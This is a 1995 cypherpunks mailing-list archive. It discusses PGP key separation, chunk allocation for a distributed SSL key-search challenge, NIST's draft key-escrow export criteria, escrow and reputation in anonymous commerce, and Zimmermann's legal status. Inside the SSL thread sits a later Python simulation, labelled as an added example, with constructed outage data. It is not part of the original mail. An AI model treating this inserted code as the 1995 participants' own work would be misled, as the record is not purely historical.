From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 1 Sep 95 21:38:08 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <v02130503ac6d34180345@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 9/1/95, Bill Stewart wrote:
>>I do not think that PGP 2.x can easily (ie: Automatically) use one key for
>>Signing and another for Encrypting a Message (it does both at the same time
>>if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
>>the result but I'm not sure if doing the decrypt on such a message will
>>automatically spot the signature and verify it (as would occur with a E+S
>>pass).
>
>PGP identifies the key for decryption and signature checking from the message.
>When you're signing a message or key, you can pick which of your keys to
>use with the -u option.

OK - I'll rephrase my query/quandary. If I create a message by feeding in
plain text and asking for an Encrypt and Sign is the FORMAT of the
resulting file different from one where I Sign the Text and then (in a
separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut
for the two processes done in sequence using the same key for both
operations)? If E+S is only a short-cut then doing the steps separately
will give the result that PGP3 will get automatically with its Separate
Function Keys Feature.

>The difficulty is getting people to use your
>encryption key instead of your signature key when encrypting stuff for you.
>Derek mentioned one approach (get people to load the encryption key first);
>unfortunately, you can't predict their behavior, and if you change encryption
>keys more often than signature keys, they'll load the newest encryption key
>last.
>Another approach is to identify them in the names - my key certification key
>says "KeyCert-only" in the text.
>
>For the problem that started this discussion, though, there's no good solution.
>Since the Bad Guys _can_ encrypt a message to you with your signature key,
>and send it to you by anonymous remailer, they can plant a reason to suspect
>that you may have evidence encrypted with that key.

This will all become (more) academic once PGP3 comes out and Sign-Only keys
would not be usable for Encryption.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 1 Sep 95 21:38:36 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
Message-ID: <v02130504ac6d39583ee9@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 9/1/95, Daniel R. Oelke wrote:
>>
>> I see nothing wrong with the concept of being allocated an initial chunk
>> and having the scan software attempt to ACK it when 50% of it has been
>> searched. A successful ACK would allow the releasing of a new chunk (in
>> response) equal in size to the returned chunk. A failure of the Server to
>> accept the ACK would trigger a retry at set intervals (such as 75% and 100%
>> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
>> in possession of a Full Sized Chunk to scan (so long as the Server accepts
>> an ACK before the 100% done mark) and temporary failures will not stop the
>> process of a scanner as currently happens.
>>
>
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then later the server is ACKed for the full 100%.
>
>Why?  Because what happens if the client dies immediately after doing
>the ACK - maybe only 51% of that space has been searched, yet
>the server has already seen an ACK for it.

I thought that the ACK gives starting location and number of segments. If I
get 500 segments and ACK at the 50% point I am sending an ACK for the
Starting Point and 250 Segments (the unprocessed part would then ACK
Start+250 for 250 when done) Just as if I had only gotten 250 in the first
place and was also given the next 250 Segment Chunk (ie: I was "Next
Requester" after my original allocation of 250).

>IMO - a % ACK is too much complexity and extra work on the server,
>which is already having trouble keeping up.

No - It is the same load if you allow the first request to be twice the
size of the subsequent requests. If you ask people to request 30 minutes
worth of segments, there is no difference in load (if the Server responds
to each ACK when first attempted) if they start each run with a 1 hour
chunk (ie: 2X Chunk) and check in every 30 min to ACK a Chunk (and to get
the one to be worked on in a half an hour [and when you are 30 minutes away
from your shut down time, just ACK and do not request another chunk]) and
just getting a X sized chunk at your initial connection.

In the 2X method, you still have a X sized Chunk to work on for the next 30
Minutes if the Server is ignoring your ACK attempt (and when that Chunk has
been scanned you return both and get two more). This is hitting the Server
once every 30 minutes and NOT pounding away at it until you get an ACK
through (and get more work) since you have no need for another chunk
immediately (as you would with the X sized Chunk every 30 minutes method)
and thus have no need to retry on a connect failure.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 1 Sep 95 21:38:32 PDT
To: Lou Poppler <lwp@mail.msen.com>
Subject: Re: SSL search attack
Message-ID: <v02130505ac6d4038dc74@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 9/1/95, Lou Poppler wrote:
>The ACK process and the allocation process are separate, and should
>remain so.  They run on different servers, and they run as separate
>processes in the unix version of brloop.  A little tweaking of brloop
>could allow pre-fetching of the next segment to search, without any
>effect on the ACK process.  I dislike the idea of a client sending an ACK
>before it has searched the entire segment.

I was not suggesting that. I was just suggesting that the initial request
be for twice the amount of segments as you want to process during your
reporting interval and that except when you are getting ready to shut down,
you have one allocation ready as a spare in case you can't immediately be
given another allocation when you ACK one.

Example: I will be running for 8 Hours and I will report back every 30
minutes. I get an Hour's worth of segments (Chunk 1 + 2) when I first
connect. After 30 Minutes, I'm done with half of them. I then ACK that half
(Chunk1) and request another 30 minutes worth of segments (for scanning at
1H-1.5H). If I do not get it, I'm still working on the 2nd Chunk. At 1H, I
ACK Chunk2 and ask for Chunk4 (also I ACK Chunk 1 and/or request Chunk 3 if
either failed the first time at .5H). This continues until 7.5 when I ACK
and do not request a Chunk 17 (since I already have or I am requesting
Chunk 16 for the 7.5H-8H period).
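
The double-sized first request described in this message and in the earlier reply to Daniel Oelke, modelled as an added example (not code from either post or from brloop). Assumptions: one chunk takes exactly one reporting interval, a server outage covers a whole interval boundary, ACK and allocation are folded into a single contact, and every name below is hypothetical.

```python
"""Client-side model of the "2X first request" chunk-allocation scheme."""
from dataclasses import dataclass, field

INTERVALS = 16          # 8 hours at one report every 30 minutes (from the post)
OUTAGES = {3, 7, 8}     # constructed: boundaries at which the server is unreachable


@dataclass
class Run:
    scanned: list = field(default_factory=list)  # chunk ids fully searched, in order
    acked: list = field(default_factory=list)    # chunk ids the server has been told about
    idle: int = 0                                # intervals spent with nothing to scan
    contacts: int = 0                            # successful server connections
    failed: int = 0                              # connection attempts that failed


def simulate(intervals, server_down, lookahead):
    """Run one client for `intervals` reporting periods.

    lookahead=1: ask for one chunk at a time (the "X sized" method).
    lookahead=2: keep one spare chunk in hand (the "2X" method).
    A chunk is ACKed only after it has been searched completely, so the
    server never records unsearched key space as done.
    """
    res = Run()
    in_hand = []     # allocated to this client, not yet searched
    finished = []    # searched, ACK still owed to the server
    next_id = 1
    for t in range(intervals + 1):          # t == intervals is the shutdown boundary
        remaining = intervals - t
        # Never hold more work than there is time left: no "Chunk 17".
        want = min(lookahead, remaining)
        if finished or len(in_hand) < want:
            if t in server_down:
                # One attempt per boundary; a real client might retry sooner.
                res.failed += 1
            else:
                res.contacts += 1
                res.acked += finished       # return every completed chunk at once
                finished = []
                while len(in_hand) < want:  # top the allocation back up
                    in_hand.append(next_id)
                    next_id += 1
        if remaining == 0:
            break
        if in_hand:
            chunk = in_hand.pop(0)
            res.scanned.append(chunk)
            finished.append(chunk)
        else:
            res.idle += 1                   # nothing to search this interval
    return res


def compare(intervals=INTERVALS, server_down=frozenset(OUTAGES)):
    """Return the two schemes' results side by side for the same outage pattern."""
    return {
        "X": simulate(intervals, server_down, lookahead=1),
        "2X": simulate(intervals, server_down, lookahead=2),
    }


if __name__ == "__main__":
    for name, run in compare().items():
        print(f"{name:>2}: scanned={len(run.scanned)} idle={run.idle} "
              f"contacts={run.contacts} failed={run.failed}")
```

With the constructed outages at boundaries 3, 7 and 8, the one-chunk client idles for three intervals and the 2X client for one: the spare chunk absorbs a single missed contact but not two in a row, and both clients make the same number of successful server contacts.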






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curran <jcurran@bbnplanet.com>
Date: Fri, 1 Sep 95 22:33:03 PDT
To: "Todd Glassey, Chief Technologist, Looking Glass Technologies" <todd@lgt.com>
Subject: Re: FSTC - Request for Info
Message-ID: <v02120d03ac6d9c8d319a@[192.52.71.147]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:05 AM 9/2/95, Todd Glassey, Chief Technologist, Looking Glass Technologies wrote:
>Hi all,
> I am now looking for pointers into this mystical consortium of financial
>wizards...  

A good place to start is the FSTC WWW pages: http://www.llnl.gov/fstc
/John






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 02:15:27 PDT
To: cypherpunks@toad.com
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <v01510100ac6dcfd46ccc@[198.59.115.135]>
MIME-Version: 1.0
Content-Type: text/plain


>I finished my first release, a megabyte-sized file done in MORE, a powerful
>outline processor (which enabled me to maintain notes, make
>cross-references, and generally manage such a huge writing project). I
>released it last year, and put it in my anonymous ftp account at
>ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
>is often very crowded, though.

After several tries I was not able to get this.  Has anyone made it
available in an alternate location?

Dar
(list newbie)

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Sep 95 18:30:25 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Workshop agenda & discussion paper 3
Message-ID: <199509020130.DAA17812@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Key Escrow Workshop agenda & discussion paper 3


September 1, 1995


Dear Participant:


Thank you for agreeing to participate in the two-day
meeting on software key escrow encryption.  We are
anxious to work with you and other industry
representatives to facilitate development of exportable
key escrow encryption in software products.  I look
forward to the workshop being an important step in that
process.


I have attached a draft agenda for the two days.  I
propose that we spend the majority of our time discussing
a set of export criteria.  In order to move that
discussion along, a draft set of criteria is attached. 
The criteria state, in general terms, the government's
needs with respect to exportable software, consistent
with its law enforcement and national security
requirements.  Since it is important that the final
criteria be clear, straightforward, consistent, and
implementable, Mike Nelson of the Office of Science and
Technology Policy will spend a few minutes describing
these criteria on the first morning of the meeting. 
After that, we would like to hear your perspectives on
them and work with you to refine them.  On the second
day, we plan to discuss the export licensing process for
such products, and begin exploring characteristics of
acceptable key escrow agents.


Again, thank you for your participation.  I look forward
to seeing you there.


Sincerely,

/ s /


Raymond G. Kammer
Deputy Director


Attachments


--------------------------------------------------------


TENTATIVE AGENDA


Key Escrow Issues Meeting


September 6-7, 1995
National Institute of Standards and Technology
Gaithersburg, Maryland


Wednesday, September 6, 1995


9:00          Welcome, Agenda Overview, Logistics
              Ed Roback, NIST

9:10          Review of Meeting Goals
              Ray Kammer, NIST Deputy Director


Session I --  Software Key Escrow Exportability Criteria


9:20          Briefing -- Discussion Draft of Software
              Key Escrow Export Criteria
              Michael Nelson, Office of Science and
              Technology Policy

10:00         Industry Perspectives on Exportability
              Criteria

              (Industry briefings/reactions  5-10
              minutes max.)

10:45         Break

11:00         Industry Perspectives on Exportability
              Criteria, continued.

11:45         Discussion of Breakout Session Tasks

              At registration, you will be asked to sign
              up for a breakout session. 

              Groups A1, A2:       Criterion #2 

              Groups B1, B2:       Criteria #3, 4, 9

              Groups C1, C2:       Criteria #5, 6

              Groups D1, D2:       Criteria #7, 8

              Criterion #10 is the subject of Session
              II, and criterion #1 (64-bit) is
              straight-forward.  

              Breakout room assignments will be
              announced at this time.


12:00         Lunch (on own, cafeteria available)


1:00          Breakout session #1
                        
              Groups will be asked to: 

              1)  determine whether each criterion is
              clear and, if not, propose appropriate
              modifications;
                     
              2)  identify issues (which may arise from
              the criteria assigned to the group) which
              need to be addressed, and by whom; and

              3)  develop technical ideas/approaches for
              achieving each criterion.

3:00          Break

3:15          Plenary -- Reports from Breakout Session
              #1

4:00          Breakout Session #2

              Participants will be asked to select
              either a technical or criteria-focused
              group.   

              Technical groups are asked to:

              1)  synthesize the proposed technical
              approaches (just presented in plenary) and
              identify/discuss the most promising
              approaches.

              Criteria focused groups are asked to:

              1)  look at all criteria and the
              comments/issues raised and propose ways to
              reconcile any differences; and
       
              2)  prioritize the issues that remain to
              be addressed, if any, for each criterion.

5:00          End of day


Thursday, September 7, 1995


9:00          Plenary -- Reports from Breakout Session
              #2

9:45          Export Licensing Process
              Randy Williams, U.S. Dept. of Commerce
              Dan Cook, U.S. Dept. of State

10:15         Questions / Discussion

10:30         Break


Session II -- Desirable Characteristics for Key Escrow
              Agents


10:45         Panel: Government Perspectives on Key
              Escrow Agent Issues
              Geoff Greiveldinger, U.S. Dept. of Justice
              Ray Kammer, NIST
              Penny Brummitt, NSA  

11:30         Industry Perspectives on K.E. Agent Issues

12:30         Lunch (on own, cafeteria available)

1:30          Breakout Session #3

              Each group is asked to identify proposed
              key criteria for desirable escrow agents. 
              Same groups and room assignments as
              Breakout session #1.

2:45          Break

3:00          Plenary - Report of Breakout Sessions


Session III -- Other Related Issues


3:30          Other Issues 

              This is an opportunity for participants to
              raise related key escrow issues.

4:30          Follow-up Issues & Wrap-up

4:45          Adjourn


Note:  The meeting will be open to the public, although
seating is limited.  Advance registration is requested,
please contact Arlene Carlton on 301/975-3240, fax:
301/948-1784 or e-mail: carlton@micf.nist.gov.          
             
_ _ _

9/1/95

                     
--------------------------------------------------------

Key Escrow Issues Meeting, September 6-7, 1995


Discussion Paper #3


Export Criteria Discussion Draft -- 64-bit Software Key
Escrow Encryption


As discussed at the SPA/AEA meeting on August 17, 1995,
the Administration is willing to allow the export of
software encryption provided that the products use
algorithms with key space that does not exceed 64 bits
and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents. On the same date,
the September 6-7 key escrow issues meeting at NIST was
also announced.  The two principal topics at the meeting
will be:  1) discussion of issues of exportability of 64-bit
software key escrow encryption and 2) desirable
characteristics for key escrow agents.


In order to help make most productive use of the limited
time available at the upcoming meeting and to better
focus deliberation, the following criteria are being
distributed for discussion purposes.  Since it is
important that final criteria be clear, straightforward,
consistent, and implementable, please review these draft
criteria and be prepared to discuss how they may be
refined and made more specific.


Draft Export Criteria for Software Key Escrow Encryption


Software key escrow encryption products meeting the
following criteria will be granted special export
licensing treatment similar to that afforded other
mass-market software products with encryption.


1.   The product will use an unclassified encryption
     algorithm (e.g., DES, RC4) with a key length not to
     exceed 64 bits.


2.   The product shall be designed to prevent multiple 
     encryption (e.g., triple-DES).


3.   The key required to decrypt each message or file
     shall be accessible through a key escrow mechanism
     in the product, and such keys will be escrowed
     during manufacture in accordance with #10.  If such
     keys are not escrowed during manufacture, the
     product shall be inoperable until the key is
     escrowed in accordance with #10.


4.   The key escrow mechanism shall be designed to
     include with each encrypted message or file, in a
     format accessible by authorized entities, the
     identity of the key escrow agent(s), and
     information sufficient for the escrow agent(s) to
     identify the key or key components required to
     decrypt that message.


5.   The product shall be resistant to any alteration
     that would disable or circumvent the key escrow
     mechanism, to include being designed so that the
     key escrow mechanism cannot be disabled by a static
     patch, (i.e., the replacement of a block of code by
     a modified block).


6.   The product shall not decrypt messages or files
     encrypted by non-escrowed products, including
     products whose key escrow mechanisms have been
     altered or disabled.


7.   The key escrow mechanism allows access to a user's
     encrypted information regardless of whether that
     user is the sender or the intended recipient of the
     encrypted information.


8.   The key escrow mechanism shall not require repeated
     involvement by the escrow agents for the recovery
     of multiple decryption keys during the period of
     authorized access.


9.   In the event any such product is or may be
     available in the United States, each production
     copy of the software shall either have a unique key
     required for decrypting messages or files that is
     escrowed in accordance with #10, or have the
     capability for its escrow mechanism to be rekeyed
     and any new key to be escrowed in accordance with
     #10.


10.  The product shall accept escrow of its key(s) only
     with escrow agents certified by the U.S. Government
     or by foreign governments with which the U.S.
     Government has formal agreements consistent with
     U.S. law enforcement and national security
     requirements.


Note: Software products incorporating additional
encryption methods other than key escrow encryption
methods will be evaluated for export on the basis of each
encryption method included, as is already the case with
existing products. Accordingly, these criteria apply only
to the key escrow encryption method incorporated by a
software product, and not to other non-escrowed
encryption methods it may incorporate.  For instance,
non-escrowed encryption using a key length of 40 bits
or less will continue to be exportable under existing
export regulations.

- - -

Please also review discussion paper #1 (distributed
earlier), which raises a number of issues involving
exportability criteria and how exportable products could
be designed.  Discussion paper #2 (also previously
distributed) presents questions involving key escrow
agents.


Note:  These issues will be discussed at the Key Escrow
Issues Meeting to be held September 6-7, 1995 (9:00 a.m.
- 5:00 p.m.) at the National Institute of Standards and
Technology (Gaithersburg, Maryland).  The meeting will be
open to the public, although seating is limited.  Advance
registration is requested, please contact Arlene Carlton
on 301/975-3240, fax: 301/948-1784 or e-mail:
carlton@micf.nist.gov.

9/1/95 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Sat, 2 Sep 95 22:06:01 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
In-Reply-To: <ac6d2ced00021004ee17@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950902083835.26730A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Also available at http://www.msen.com/~lwp/Cyphernomicon.gz

On Fri, 1 Sep 1995, Timothy C. May wrote:

> released it last year, and put it in my anonymous ftp account at
> ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
> is often very crowded, though.
> 
> I know of a couple of alternative places. A very nice job of HTMLizing it
> was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL
> 
> http://www.oberlin.edu/~brchkind/cyphernomicon/
> 
> Another URL, which is just one large file, is
> 
> http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Sat, 2 Sep 95 07:42:13 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <199509021451.JAA14144@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>Subject: Re: A problem with anonymity
>From: monty.harder@famend.com (MONTY HARDER)
>
>TC> This is one thing that _bonding_ is designed to partially ameliorate. One
>TC> posts a bond which is greater than the amount being carried, or at least is
>
>  A variation of a bond is an escrow agent....
>
>     Overload Alert: I use "escrow" here in the more mundane sense of
>     the folks who collect your real estate taxes and homeowners'
>     insurance from you 1/12th at a time along with your mortgage
>     payment, for instance.
>
>  If the buyer has a =nonymous= agent to receive the payment, which is
>only released to the seller upon proof(s) of performance (whether in
>lump sum or on a schedule of staged payments tied to specific milestones
>in a long-term project) then the buyer has someone to go after in the
>event of such shenanigans.
>
>TC> There are still scams and maneuvers to thwart this reputation capital
>TC> scheme. The agent planning to "defect" (default, split, abscond, renege,
>TC> etc.) can try to pile up as many pending transactions as possible,
>TC> anticipating that the various transactees will be unaware of each other.
>
>  And the escrow method dynamically scales to meet this threat, whereas
>the bond is static.
>
>  Of course, the escrow agent will extract his pound of flesh, just as
>any other form of insurance. Such is the nature of life.
>
Actually, you guys are trying to repeat the whole history of the
law merchant (today's commercial law).  The basic problem was how
can a buyer in one city acquire goods from a seller in another
through agents acting at a distance when neither knows the other
and neither is willing to risk loss on the transaction.

The use of bankers, as either trusted or bonded third parties,
acting as escrowees under the control of a letter of credit was
the result.

Buyer, B, deposits money with the bank, E, with instructions
to release the money on proof of receipt of the goods.  E gives
B a receipt and a written promise to pay.  B trades the promise
to pay to Seller, S, in exchange for the goods.  S, who either
trusts E or has access to his bond, is willing to accept E's
promise to pay, which he then negotiates.  The result is that
B and S have a secure transaction without trusting each other,
and E gets rich.

Notice, we don't care about the reputation or identity of either
B or S, and a very few trusted or bonded Es can facilitate
many many transactions.

Incidentally, you all are using the word "escrow" correctly.
An escrow is an arrangement in which property is deposited with
an escrowee to hold until the happening or failure of a
contingency, at which time he delivers the property according to
the escrow instructions.  House sales, in which the seller deposits
a deed and the buyer deposits the purchase price pending proof of title,
are only one kind of escrow.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Buford C. Terrell
South Texas College of Law
1303 San Jacinto, Houston, TX 77002
(713)646-1857    terrell@sam.neosoft.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 09:39:05 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6dd783060210040223@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 PM 9/2/95, Buford Terrell wrote:

>Actually, you guys are trying to repeat the whole history of the
>law merchant (today's commercial law).  The basic problem was how
>can a buyer in one city acquire goods from a seller in another
>through agents acting at a distance when neither knows the other
>and neither is willing to risk loss on the transaction.

Which might be why I specifically cited this last night in an article in
this thread:

"(Think of various trading situations where one has no idea of the True Name
of the other parties: cash-and-carry transactions, flea markets, many
international trade arrangements, etc. As we have discussed in past
discussions of anarchy, the international trading regime is essentially an
anarchy, in that no Higher Authority exists to resolve disputes in a
top-down way...the so-called "Law Merchant" evolved to resolve disputes in
such trading situations.)"

Benson's "The Enterprise of Law" is of course a libertarian outlook on
these matters. (I should mention that Michael Froomkin says he doesn't
think much of it, but I found it useful, especially as it confirmed my
views on these matters! :-})


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Sat, 2 Sep 95 07:59:29 PDT
To: cypherpunks@toad.com
Subject: Re: Macintosh Users: "SpeedDoubler"
Message-ID: <v02130500ac6ddb766546@[199.1.11.220]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
>For you Macintosh users, I thought I'd share with you my experiences with
>SpeedDoubler, a new utility that (effectively) doubles or even triples
>performance of many applications that still are heavily dependent on 68K
>code (as opposed to purely PowerPC code).
>
> ...
>
>All I can say is that I'm very happy.
>
>--Tim May

Just wanted to echo Tim's sentiments.  I purchased SpeedDoubler yesterday
(fifty-something dollars at Computer City) and the speed improvements i've
seen on my PowerMac 7100/66 are impressive.  It's definitely worth the money.


        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 09:54:21 PDT
To: cypherpunks@toad.com
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <ac6dda6a08021004b0c3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:13 AM 9/2/95, Dar Scott wrote:

>After several tries I was not able to get this.  Has anyone made it
>available in an alternate location?
>
>Dar
>(list newbie)
>
>===========================================================
>Dar Scott               Home phone: +1 505 299 9497
>
>Dar Scott Consulting         Voice: +1 505 299 5790  <---
>8637 Horacio Place NE        Email: darscott@aol.com
>Albuquerque, NM  87111              dsc@swcp.com
>                               Fax: +1 505 898 6525
>http://www.swcp.com/~correspo/DSC/DarScott.html

Help me out here, Dar...

You list a Web site in your sig, so presumably you have the right tools to
browse the Web. And I listed two Web sites that have the Cyphernomicon.

What am I missing?

Browsing the Web versions, especially the HTMLized version by Rochkind at
http://www.oberlin.edu/~brchkind/cyphernomicon/  is a much better way to
read it than by downloading the text version.

Nevertheless, if someone wants to copy the CP-FAQ file to their ftp site, I
have no real objections at this time.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 2 Sep 95 10:37:25 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <199509021737.KAA23763@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Regarding the statute of limitations date on PRZ,

> "Perry E. Metzger" <perry@piermont.com> writes:
>                      The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year.  Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

PGP 1.0 was available in at least Finland and Australia by 28 Aug 91,
according to an ftp list John Gilmore posted on that date.  However, the
first available date is presumably not as important as the most recent
offense, and I haven't seen which specific allegations the gov't is
investigating.

	Jim Gillogly
	11 Halimath S.R. 1995, 17:35




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray <davidm@iconz.co.nz>
Date: Fri, 1 Sep 95 15:46:04 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <199509012245.KAA27969@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Tim May said in article <ac6b9e29040210042a10@[205.199.118.202]>:
> At 11:32 PM 8/31/95, Scott Brickner wrote:
..
> >he sells its assets to his own identity at a fraction of their worth,
> >and defaults on the liabilities.
>      ^^^^^^^^^^^^^^^^^^^^^^^^^^^
..
> ideally, one never "trusts" an agent with a transaction greater than the
> value of the reputation capital he will lose if he defaults.
.. 
> Whether cryptographic protocols (cf. the "encrypted open books" proposal by
> Eric Hughes for one approach which may be useful) solve this problem is not
> known at this time. But the non-crypto world has of course not solved this
> problem, either.

I've often thought that in a system of digital pseudonyms, where no-one need
trade with a negative reputation (a reputation deficit?), something like
Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated
as (reputationally) worthless.

[Akerlof, if I remember my economics right (and I am confident that I will
be corrected if I don't) analysed a market for used cars. There were two
types of cars: good ones, and lemons. A purchaser couldn't tell the difference
until she had bought the car. Since the expected value of a used car was less
than the value of a good car, purchasers wouldn't pay the good car price.
But that would mean owners of good cars wouldn't offer them for sale (in
this market). So the only cars for sale would be lemons :-)]

As Tim points out, this is a non-crypto problem as well, and devices such as
bonds or (which are game-theoretically similar) expensive advertising or
plush premises [if they spent an unrefundable $20million on the Rolling
Stones, they're not likely to throw it all away by ripping you off for
$100 ;-)] are used to convince potential customers of one's bona fides.

How these transfer to the world of cyber-finance, I'm not sure, but I suspect
it leaves a role for True Names in the management of credit risk: as escrow
agents, middlemen, clearing houses etc. [Although, having said that, if the
Akerlof analysis applies, you just *can't* grant (unsecured) credit to
pseudonyms - the percentage of defaulters will be 100...] But these Names are
True only in the sense that they are juridically persistent (that is, if
they transact today, they can be sued tomorrow), and need not be traceable
to any True People (Warm Bodies?) - anonymously held corporations, for
example.

If you can't rely on the unsecured promise of a digital pseudonym, and you
can't accept reputation as 'security', how do you extend credit?

Dm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEd+81lo3j8JHzalAQFo0AQAkohUuFg6QwRaY7X5LwF1YXCby1uCKQmI
FfmQHmEa55oeht9Vc4DN1V+dIGjVWRIxS3ib/oRYsXY9HWo8pI3gMKhbnsBf3OzN
jVuoUR8Tgx1HcX59uBjbpxKNHFw5U4gPN70zvbLJhbw1UHWr24tq5RJri22coCh7
1Dm016RMHns=
=rl4c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 00:14:55 PDT
To: adwestro@ouray.cudenver.edu (Alan Westrope)
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <jw5RwkkAs2nN084yn@ouray.cudenver.edu>
Message-ID: <199509021658.MAA29224@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Westrope writes:
> On Fri, 01 Sep 1995, Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:
> 
> > I think he would have to be charged first.  Have I missed something?
> > PS when does the statute of limitations run out?
> 
> June '96.  Zimmermann and Dubois appeared on a local talk radio show
> recently; a friend happened to catch the program, taped it, and played
> excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

That's not possible. The offense in question took place on or before
September 8, 1992, and the statute of limitations is, to my knowledge,
three years. Even if it were four years, it would have to be September
8th of that year.  Branko Lankester announced availability of PGP 2.0
on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
he exported PGP Version 1.0 to the team that developed PGP 2.0
overseas, any export that Phil performed would have of necessity to
have taken place before then.

Michael, you are one of our local lawyers. Could you please confirm
the length of the statute of limitations?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 11:01:19 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz -- Great Party!
